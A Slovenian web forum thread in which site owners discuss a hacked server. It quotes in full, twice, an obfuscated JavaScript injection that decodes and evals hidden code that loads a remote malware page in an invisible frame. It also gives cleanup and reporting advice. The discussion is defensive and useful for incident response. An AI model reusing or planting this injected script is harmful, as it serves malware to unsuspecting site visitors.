Hacked

Ja še copy pastat ne mormo da pogledamo kaj sploh nardi oz. da deobfuskeramo. Številke so verjetno ascii znaki neke druge kode, mogoče je vse skupaj zamaknjeno za par znakov. Vsekakor se neka nova koda zgradi, za kaj več pa prilepi ali daj link do tekstovne oblike tega

Koda:

<!--a6f227--><script type="text/javascript" language="javascript">if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113,101,39,58,11,10,31,95,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,95,46,114,114,121,107,99,46,97,109,114,99,99,114,31,59,32,38,46,39,58,11,10,31,95,46,114,114,121,107,99,46,103,99,105,102,102,116,31,59,32,38,48,112,119,37,59,12,8,32,96,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,50,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,107,99,102,115,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,115,109,112,31,59,32,38,47,112,119,37,59,12,8,13,9,30,105,101,38,33,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,39,13,9,30,123,12,8,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,109,96,112,119,96,98,115,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,97,40,57,13,9,30,125,12,8,125,40,38,41,58,11,10);}w=f;s=[];r=String;for(i=0;-i+412!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");}</script><!--/a6f227-->

oz polepšana z http://jsbeautifier.org/

if (021 === 0x11) v = "va" + "l";
try {
    faweb++
} catch (btawetb) {
    try {
        fve ^ v
    } catch (btawt4) {
        try {
            window.document.body = v
        } catch (gdsgsdg) {
            w = window;
            if (020 === 0x10) e = w["e".concat(v)];
        }
    }
}
if (1) {
    f = new Array(40, 101, 115, 110, 98, 114, 105, 110, 108, 40, 40, 11, 10, 122, 11, 10, 31, 116, 97, 113, 30, 97, 31, 59, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 98, 112, 101, 96, 114, 101, 68, 106, 101, 108, 99, 110, 115, 38, 39, 104, 100, 114, 96, 107, 101, 38, 39, 59, 12, 8, 13, 9, 30, 97, 45, 113, 114, 98, 30, 61, 31, 37, 104, 115, 114, 112, 57, 45, 47, 102, 99, 116, 120, 109, 117, 113, 96, 101, 115, 44, 111, 113, 101, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 111, 109, 115, 104, 114, 105, 110, 108, 32, 60, 30, 39, 96, 96, 115, 110, 106, 117, 115, 99, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 97, 109, 114, 99, 99, 114, 31, 59, 32, 38, 46, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 103, 99, 105, 102, 102, 116, 31, 59, 32, 38, 48, 112, 119, 37, 59, 12, 8, 32, 96, 44, 115, 115, 119, 108, 100, 44, 119, 104, 98, 116, 103, 30, 61, 31, 37, 50, 111, 118, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 107, 99, 102, 115, 30, 61, 31, 37, 49, 111, 118, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 115, 109, 112, 31, 59, 32, 38, 47, 112, 119, 37, 59, 12, 8, 13, 9, 30, 105, 101, 38, 33, 99, 109, 99, 116, 107, 101, 109, 114, 46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64, 121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39, 40, 39, 13, 9, 30, 123, 12, 8, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 118, 112, 105, 115, 99, 40, 38, 58, 100, 104, 116, 32, 104, 98, 61, 91, 37, 109, 96, 112, 119, 96, 98, 115, 91, 37, 62, 59, 45, 100, 104, 116, 62, 38, 39, 59, 12, 8, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64, 121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39, 40, 44, 97, 111, 110, 101, 109, 98, 67, 103, 103, 108, 99, 38, 97, 40, 57, 13, 9, 30, 125, 12, 8, 125, 40, 38, 41, 58, 11, 10);
}
w = f;
s = [];
r = String;
for (i = 0; - i + 412 != 0; i += 1) {
    j = i;
    if (e && (031 == 0x19)) s = s + r["fromCh" + "arC" + ((020 === 0x10) ? "ode" : "")]((1 * w[j] + j % 3));
}
try {
    (w + s)()
} catch (asga) {
    e(s + "");
}

Seveda ni priporočljivo klikati na link v zgornji kodi, ker v nekaterih primerih (ustrezen referrer) menda postreže malware.
Nekaj več o tem napadu: http://blog.dynamoo.com/2012/11/getyour...

Uff, hvala za tole. Je pomagalo pri "pucanju" serverja.

Ja, jasno, da moramo najti luknjo. Prvo kar sem naredil je, da sem vsa gesla zamenjal, odstranil FTP program, v primeru, da so moj pc hijackal in tako prisli do FTP dostopov. Slednje tudi najbolj sumim, ker ne najdem druge povezave. Imam vec streznikov, nekje tece CMS, nekje forum, nekje neke druge custom skripte. Cudno je to, da so prisli do vseh streznikov, razen do enega. Zato sem posumil, da je moj pc izvor. Ampak se je izkazalo da ni tako, ker sem, po menjavi vseh ftp gesel, ugasnil moj pc cez vikend. Danes zjutraj pa spet vse okuzeno. Razumel bi, da npr. injectajo v nek forum, ki je open source, ampak neko skripto, ki smo jo sami spisali in njena narava ne omogoca inejctinga (neka funkcija za maile posiljat), je tudi okuzena.

Zato ubistvu niti ne vem vec, kje gledat. Kaksna ideja mogoče?

Hvala

Aha, če bo komu prav prišlo. Text Workbench je fino orodje, ki ima find&replace + regex in se zna povezat na FTP. En site spucan v petih minutah, kolikor rabi program, da gre čez vse datoteke.

Sem zadevo danes prijavil na
http://www.stopbadware.org/reports/b4bf...
od tu naprej bo pa verjetno šlo na Google safe browsing, od tam pa prek APIja v brskalnike, firewalle, antiviruse...

Btw: ob tem mi je antivirus zaznal "JS/Kryptik.AAW trojan":

...če ti kaj pomaga pri čiščenju.